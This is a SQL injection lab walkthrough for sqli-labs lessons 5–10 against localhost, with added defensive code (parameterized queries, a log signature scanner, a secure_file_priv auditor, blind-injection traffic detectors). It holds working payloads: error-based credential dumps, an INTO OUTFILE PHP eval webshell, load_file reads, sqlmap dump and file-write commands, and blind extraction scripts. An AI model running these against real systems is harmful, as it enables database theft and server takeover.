```php
<?php
// Less-5 (error-based): the rows themselves are never echoed, but the raw
// mysql_error() text is sent to the client when the query fails.
if (isset($_GET['id'])) {   // outer check restored for completeness; the page shows only the fragment inside it
    $id = $_GET['id'];      // user-controlled value spliced straight into the SQL text
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if ($row) {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    } else {
        echo '<font size="3" color="#FFFF00">';
        print_r(mysql_error());   // database error details leak to the response
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
?>
```
The query result is not displayed, but the database error message is printed to the page.
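The defensive counterpart of the fragment above, as an added example that is not part of the original post or of sqli-labs: the same lookup written twice in Python over an in-memory SQLite table (a stand-in for `security.users` with constructed rows, so it runs without a MySQL server), once splicing the id into the SQL text and returning the raw error as the PHP does, and once with type validation, a bound parameter, and a generic client-facing message. All function and table names are my own.

```python
import logging
import sqlite3


def make_db():
    """In-memory stand-in for sqli-labs' security.users with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")])
    return con


def lookup_vulnerable(con, user_id):
    """Mirror of the PHP above: the id is spliced into the SQL text and the
    raw database error goes back to the caller, like print_r(mysql_error())."""
    sql = "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % user_id
    try:
        return con.execute(sql).fetchall(), None
    except sqlite3.Error as e:
        return [], str(e)          # error details reach the client


def lookup_hardened(con, user_id):
    """Same lookup with the fixes: validate the type the page itself expects
    (a numeric id), bind the value as a parameter so it can never change the
    statement, and keep error details in the server log, not the response."""
    if not str(user_id).isdigit():
        return [], "invalid id"
    try:
        rows = con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1",
                           (int(user_id),)).fetchall()
        return rows, None
    except sqlite3.Error as e:
        logging.error("users lookup failed: %s", e)   # stays server-side
        return [], "request could not be processed"


if __name__ == "__main__":
    con = make_db()
    for probe in ("1", "1'", "2' OR '1'='1"):
        print(repr(probe), "vulnerable:", lookup_vulnerable(con, probe),
              "hardened:", lookup_hardened(con, probe))
```

Running the module shows the three behaviours side by side: `1` returns the first row in both versions; a lone `1'` produces a database error string from the vulnerable version and only `invalid id` from the hardened one; `2' OR '1'='1` makes the vulnerable version return a row the caller never asked for, while the hardened version rejects it before any SQL runs.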
The principle behind this kind of injection can be looked up elsewhere; the injection methods are covered in reference [1]. Below, only the commonly encountered ones among the ten error-based injection methods are listed.
```sql
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
```
* Usage
http://localhost/sqlilabs2/Less-5/index.php?id=-1' union select 1,count(*),concat((floor(rand(0)*2)),'--',(select concat(id,'-',username,'-',password) from security.users limit 0,1))x from information_schema.tables group by x%23
* Notes on use
- The payload is the inner concat() part; changing that part runs a different query.
- Only concat() can be used for the join, not group_concat(), and only one row is shown at a time.
- For the error above to be triggered, the database needs at least 3 rows of data.
* Notes on use
- The function is only supported in MySQL 5.1.5 and later.
- The returned data is limited to 32 characters.
- Use the substring() function to shift the offset and read the rest.
http://localhost/sqlilabs2/Less-5/index.php?id=-1' and (extractvalue(1,concat(0x7e,(select substring(group_concat(username),1) from users),0x7e)))--+
http://localhost/sqlilabs2/Less-5/index.php?id=-1' and (updatexml(1,concat(0x7e,(select SUBSTRING(group_concat(username),12) from users),0x7e),1))--+
* Notes on use
- The function is only supported in MySQL 5.1.5 and later.
- The returned data is limited to 32 characters.
- Use the substring() function to shift the offset and read the rest.
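Each of the three error-based techniques above leaves a recognisable token in the query string (the floor/rand group-by construct, extractvalue(), updatexml()). The following added example, my own code rather than anything from the post, turns those into signatures and runs them over a few constructed access-log lines (not real traffic) whose injected requests reuse the payload shapes shown on this page. The log format, signature names and sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the error-based techniques listed above. A technique matches
# only when all of its patterns match the URL-decoded, lower-cased query string.
SIGNATURES = {
    "floor_rand_groupby": [r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", r"group\s+by"],
    "extractvalue": [r"extractvalue\s*\("],
    "updatexml": [r"updatexml\s*\("],
}

# Apache-style request line: client ip, bracketed timestamp, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [12/Mar/2024:10:00:00 +0800] "GET /sqlilabs2/Less-5/index.php?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [12/Mar/2024:10:00:01 +0800] "GET /sqlilabs2/Less-5/index.php?id=-1\'%20and%20'
    '(extractvalue(1,concat(0x7e,version(),0x7e)))--+ HTTP/1.1" 200 640',
    '127.0.0.1 - - [12/Mar/2024:10:00:02 +0800] "GET /sqlilabs2/Less-5/index.php?id=-1\'%20union%20select%20'
    '1,count(*),concat(floor(rand(0)*2),\'--\',version())x%20from%20information_schema.tables%20group%20by%20x%23'
    ' HTTP/1.1" 200 700',
]


def classify_query(query):
    """Return the names of every signature the (still URL-encoded) query string matches."""
    q = unquote_plus(query).lower()
    return sorted(name for name, pats in SIGNATURES.items()
                  if all(re.search(p, q) for p in pats))


def scan_log(lines):
    """Parse each log line and report the requests whose query string matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        parts = urlsplit(target)
        techniques = classify_query(parts.query)
        if techniques:
            hits.append({"ip": ip, "path": parts.path, "status": int(status),
                         "techniques": techniques})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
```

Decoding before matching matters: the payloads on this page arrive with `%20` for spaces and `%23` for `#`, and the floor/rand signature is deliberately a pair of patterns so that an ordinary `GROUP BY` in a legitimate query does not fire on its own.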
Similar to Less-5; the only difference is that the closing character is a double quote.
http://127.0.0.1/sqlilabs2/Less-6/index.php?id=-1" union select 1,count(*),concat((floor(rand(0)*2)),'--',(select concat(id,'-',username,'-',password) from security.users limit 0,1))x from information_schema.tables group by x%23
Straight to the sqlmap command (works for both Less-5 and Less-6):
```shell
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-5/index.php?id=1" --technique E -D security -T users --dump --batch
```
```php
<?php
// Less-7: the id is wrapped as (('$id')) and a fixed message replaces the
// database error, so nothing from mysql_error() reaches the client.
if (isset($_GET['id'])) {   // outer check restored for completeness; the page shows only the fragment inside it
    $id = $_GET['id'];
    $sql = "SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if ($row) {
        echo '<font color= "#FFFF00">';
        echo 'You are in.... Use outfile......';
        echo "<br>";
        echo "</font>";
    } else {
        echo '<font color= "#FFFF00">';
        echo 'You have an error in your SQL syntax';
        //print_r(mysql_error());
        echo "</font>";
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
?>
```
- secure-file-priv: if the file write does not succeed, check whether the MySQL config file my.ini contains a secure-file-priv entry.
- The secure-file-priv parameter restricts which directory LOAD DATA, SELECT ... INTO OUTFILE and LOAD_FILE() are allowed to use.

Check in MySQL whether file writing is enabled with:
```sql
show global variables like '%secure%'
```
Edit my.ini and add the secure-file-priv parameter; leaving it without a value means no restriction (which is actually very dangerous).
Then restart MySQL.
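The three states that setting can be in (NULL, empty, or a directory) carry very different risk, and the case this lesson depends on is a directory that the web server also serves. The added example below, my own code and not part of the post, parses the text output of `show global variables like '%secure%'` from the mysql client and labels the result; the sample outputs are constructed and the web root is assumed from the outfile paths used on this page.

```python
# Constructed sample outputs of `show global variables like '%secure%'`
# in the mysql client's table format (not captured from a real server).
SHOW_EMPTY = """\
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | ON    |
| secure_file_priv |       |
+------------------+-------+
"""

SHOW_NULL = SHOW_EMPTY.replace("| secure_file_priv |       |", "| secure_file_priv | NULL  |")

# Assumed web root, taken from the outfile paths used on this page.
WEB_ROOT = r"E:\softs\phpstudy_pro\WWW"


def parse_secure_file_priv(show_output):
    """Return the reported value of secure_file_priv ('' when empty,
    'NULL' when disabled), or None if the variable is not in the output."""
    for line in show_output.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) >= 2 and cells[0] == "secure_file_priv":
            return cells[1]
    return None


def _norm(path):
    # Compare Windows- and Unix-style paths case-insensitively with one separator.
    return path.replace("\\", "/").rstrip("/").lower()


def classify_secure_file_priv(value, web_root):
    """Map the variable's value to a risk label and a one-line explanation.
    MySQL semantics: NULL disables import/export, '' allows any directory,
    a path confines LOAD DATA, SELECT ... INTO OUTFILE and LOAD_FILE() to it."""
    if value is None:
        return "unknown", "variable not reported; check the server version and my.ini"
    if value.upper() == "NULL":
        return "disabled", "file import and export are switched off"
    if value == "":
        return "unrestricted", "any directory mysqld can write to, including the web root"
    v, root = _norm(value), _norm(web_root)
    if v == root or v.startswith(root + "/"):
        return "restricted_under_web_root", ("files are confined to a directory the web server "
                                             "also serves, so a written .php file is still reachable")
    return "restricted", "writes confined to " + value


def audit(show_output, web_root=WEB_ROOT):
    """Parse and classify in one step."""
    return classify_secure_file_priv(parse_secure_file_priv(show_output), web_root)


if __name__ == "__main__":
    for name, out in (("empty", SHOW_EMPTY), ("NULL", SHOW_NULL)):
        print(name, "->", audit(out))
```

The practical reading of the labels: `unrestricted` is the configuration the text above calls dangerous, `restricted_under_web_root` is what makes the outfile trick below reachable from a browser, and only `disabled` or a `restricted` directory outside the web tree closes that path.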
Writing a one-line webshell:
http://127.0.0.1/sqlilabs2/Less-7/index.php?id=-1')) union select 1,0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e,3 into outfile "E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\mm2.php"--+
Writing phpinfo:
http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1')) union select 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile "E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\pp2.php"--+
Notes on writing files:
- You can check the target directory and see that the file was written successfully.
- The file can also be requested directly in the browser, and it executes.
http://127.0.0.1/sqlilabs2/Less-3/index.php?id=-1') union select 1,load_file('e:\mm.php'),3--+
File read:
```shell
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-1/index.php?id=1" --file-read "E:\mm.php"
```
File write:
```shell
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1" --file-write "/home/bb/1.txt" --file-dest "E:\sql2.php" --batch
```
```python
import string
import requests
from time import sleep

arlist = string.printable
Baseurl = "http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1' and "


def checkurl(url):
    # Less-8 prints "You are in" only when the injected condition is true.
    res = requests.get(url)
    if res.ok:
        if 'You are in' in res.text:
            return True
    return False


def main():
    flag = ''
    for g in range(1, 100):  # substr() positions start at 1, not 0
        for i in arlist:
            payload = "substr((select group_concat(username,password) from users),%s,1) = '%s'--+" % (g, i)
            finalurl = Baseurl + payload
            if checkurl(finalurl):
                flag = flag + str(i)
                print(flag)
                break  # character found; move on to the next position
            sleep(0.2)


if __name__ == "__main__":
    main()
```
Straight to the sqlmap command:
```shell
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1" --technique B -D security -T users -C username,password --dump --threads 10 --batch
```
```php
<?php
// Less-8 (boolean-based blind): "You are in" for a true condition, nothing at
// all for a false one or for a query error.
if (isset($_GET['id'])) {   // outer check restored for completeness; the page shows only the fragment inside it
    $id = $_GET['id'];
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if ($row) {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    } else {
        echo '<font size="5" color="#FFFF00">';
        //echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
?>
```
The source for the time-based blind injection is as follows:
```php
<?php
// Less-9 (time-based blind): both branches print the same "You are in" text,
// so response time is the only observable difference.
if (isset($_GET['id'])) {   // outer check restored for completeness; the page shows only the fragment inside it
    $id = $_GET['id'];
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if ($row) {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    } else {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
?>
```
```python
import string
import requests
from time import sleep

arlist = string.printable
Baseurl = "http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1' and "


def checkurl(url):
    # sleep(5) fires only when the condition is true, so hitting the 3 s
    # timeout means "true"; a prompt reply means "false".
    try:
        requests.get(url, timeout=3)
        return False
    except requests.exceptions.Timeout:
        return True


def main():
    flag = ''
    for g in range(1, 100):  # substr() positions start at 1, not 0
        for i in arlist:
            payload = "if((substr((select group_concat(username,password) from users),%s,1) = '%s'),sleep(5),1)--+" % (g, i)
            finalurl = Baseurl + payload
            if checkurl(finalurl):
                flag = flag + str(i)
                print(flag)
                break  # character found; move on to the next position
            sleep(0.2)


if __name__ == "__main__":
    main()
```
payload:
http://127.0.0.1/sqlilabs2/Less-10/index.php?id=1" and if((length(database())=8),sleep(5),1)--+
Straight to the sqlmap command (works for both Less-9 and Less-10):
```shell
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1" --technique T -D security -T users -C username,password --dump --threads 10 --batch
```
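Neither blind script above leaves a distinctive string in the page, so on the defending side the traffic shape is what gives them away: one client sending many near-identical requests to one path within seconds, and (for the time-based variant) a handful of responses that take ~5 s where the path normally answers in milliseconds. The following added example is my own code, not from the post; it runs two such detectors over constructed records (not real logs) built to mirror the loops above. Field names, thresholds and sample values are assumptions.

```python
import re
import statistics
from collections import defaultdict


def constructed_records():
    """Constructed sample traffic (not real logs): an access log reduced to the
    fields the detectors need; duration_s is the server's response time."""
    recs = []
    # 30 requests in 6 s from one client that differ only in position and
    # candidate character: the shape the boolean-blind loop above produces.
    t = 0.0
    for pos in range(1, 4):
        for ch in "abcdefghij":
            q = ("id=1' and substr((select group_concat(username,password) from users),%d,1) = '%s'-- "
                 % (pos, ch))
            recs.append({"ts": t, "ip": "127.0.0.1", "path": "/sqlilabs2/Less-8/index.php",
                         "query": q, "duration_s": 0.04})
            t += 0.2
    # Three ordinary lookups from another client spread over several seconds.
    for i, ts in ((1, 0.5), (2, 3.0), (3, 7.5)):
        recs.append({"ts": ts, "ip": "10.0.0.5", "path": "/sqlilabs2/Less-8/index.php",
                     "query": "id=%d" % i, "duration_s": 0.05})
    # Two time-based probes: only the true branch makes the page take ~5 s.
    recs.append({"ts": 20.0, "ip": "127.0.0.1", "path": "/sqlilabs2/Less-9/index.php",
                 "query": "id=1' and if((length(database())=8),sleep(5),1)-- ", "duration_s": 5.1})
    recs.append({"ts": 26.0, "ip": "127.0.0.1", "path": "/sqlilabs2/Less-9/index.php",
                 "query": "id=1' and if((length(database())=9),sleep(5),1)-- ", "duration_s": 0.05})
    for ts in (30.0, 31.0, 32.0):
        recs.append({"ts": ts, "ip": "10.0.0.5", "path": "/sqlilabs2/Less-9/index.php",
                     "query": "id=1", "duration_s": 0.05})
    return recs


def template(query):
    """Collapse what an enumeration loop varies (numbers, single-character
    quoted literals) so every probe of one loop maps to the same key."""
    q = re.sub(r"\d+", "N", query)
    return re.sub(r"'.'", "'?'", q)


def enumeration_bursts(records, window_s=10.0, threshold=20):
    """Flag (ip, path, template) groups that send >= threshold requests inside
    any sliding window of window_s seconds."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["ip"], r["path"], template(r["query"]))].append(r["ts"])
    flagged = {}
    for key, times in groups.items():
        times.sort()
        peak, lo = 0, 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged


def slow_response_outliers(records, floor_s=4.5, ratio=10.0):
    """Flag requests that took at least floor_s seconds and at least ratio times
    the median for their path: the footprint of a sleep()-based true branch."""
    by_path = defaultdict(list)
    for r in records:
        by_path[r["path"]].append(r["duration_s"])
    medians = {p: statistics.median(d) for p, d in by_path.items()}
    return [(r["ip"], r["path"], r["query"], r["duration_s"]) for r in records
            if r["duration_s"] >= floor_s and r["duration_s"] >= ratio * medians[r["path"]]]


if __name__ == "__main__":
    recs = constructed_records()
    for key, n in enumeration_bursts(recs).items():
        print("burst: %d near-identical probes from %s to %s" % (n, key[0], key[1]))
    for ip, path, query, dur in slow_response_outliers(recs):
        print("slow: %.1fs for %s %s?%s" % (dur, ip, path, query))
```

The burst detector keys on a normalised query rather than on any SQL keyword, so it also catches sqlmap's boolean enumeration and it does not fire on a user who opens three different records over several seconds; the timing detector compares against the per-path median so that a path that is simply slow everywhere is not reported.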
[1] Reference: https://www.cnblogs.com/csyxf/p/10241456.html